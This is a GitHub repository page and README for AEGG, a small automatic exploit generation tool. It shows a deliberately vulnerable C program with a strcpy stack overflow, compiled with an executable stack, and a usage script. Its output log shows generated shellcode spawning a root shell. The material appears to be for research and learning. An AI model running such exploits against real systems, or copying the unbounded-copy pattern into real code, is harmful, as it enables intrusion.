my automatic exploit generation

Latest commit 2783488 Jun 21, 2016

Name            Latest commit message                              Commit time
exploits        Fixed rop env LD_LIBRARY_PATH                      Jun 20, 2016
.gitignore      Initial package                                    Jun 13, 2016
LICENSE         Initial commit                                     Jun 18, 2016
README.md       Modified Usage in README.md                        Jun 21, 2016
__init__.py     Modified README and added exception in analyzer    Jun 18, 2016
aegg.py         Completed rop                                      Jun 19, 2016
analyzer.py     Fixed rop env LD_LIBRARY_PATH                      Jun 20, 2016
bug_finder.py   Modifying ROP                                      Jun 18, 2016
exploit.py      Completed rop                                      Jun 19, 2016
exploiter.py    Completed rop                                      Jun 19, 2016
payload.py      Completed rop                                      Jun 19, 2016
verifier.py     Completed rop                                      Jun 19, 2016

README.md

AEGG

AEGG is my simple automatic exploit generation tool. It currently supports only x86 binaries.

Usage

  1. vi vul.c:
    #include <stdio.h>
    #include <unistd.h>
    #include <string.h>
    
    char buf[100];           /* global input buffer; read() below accepts up to 307 bytes */
    
    int sample_func() {
        char name[10] = {0}; /* 10-byte stack buffer */
        read(0, buf, 307);
        strcpy(name, buf);   /* unbounded copy into name: the stack overflow AEGG finds */
        printf("input: %s\n", name);
        return 0;
    }
    
    int main(void)
    {
        printf("Running...\n");
        sample_func();
        printf("Done.\n");
        return 0;
    }
    
  2. compile vul (32-bit, with debug info and an executable stack):
    gcc vul.c -o vul -m32 -g -z execstack
    
  3. vi my_aegg.py:
    from aegg import AEGG
    
    binary = './vul'
    gg = AEGG(binary)
    
    # generating payload!
    gg.hack()
    
    # show the first generated payload and write it out as ./vul.exp
    print(repr(gg.payloads[0].content))
    gg.save()
    

Result

$ python my_aegg.py
...
INFO    | 2016-06-18 00:10:11,717 | aegg.aegg | Start hacking ...
INFO    | 2016-06-17 23:44:43,872 | pwnlib.elf | Stack is executable!
[+] Started program './vul'
INFO    | 2016-06-17 23:44:46,974 | pwnlib.tubes.process | Started program './vul'
[*] Stopped program './vul'
INFO    | 2016-06-17 23:44:47,976 | pwnlib.tubes.process | Stopped program './vul'
INFO    | 2016-06-17 23:44:47,980 | aegg.aegg | Generated!
INFO    | 2016-06-17 23:44:47,980 | aegg.aegg | Completed.
$
$ (cat ./vul.exp; cat) | ./vul
Running...
input: jhh///sh/bin��1�j
                           �̀ÿ @@   @
id
uid=0(root) gid=0(root) groups=0(root)

Dependencies

  • angr
  • pwntools

TODO

  • shellcode (ret2stack)
  • ROP (ret2libc)
  • ROPgadget
  • fmtstr exploit
  • AEGG: inputs in exploit_gen instead of paths (for fuzzing)
  • ret2stack: try every buffer
  • ret2stack: nop-sled

References

angr-doc/examples/insomnihack_aeg

(State of) The Art of War: Offensive Techniques in Binary Analysis

AEG: Automatic Exploit Generation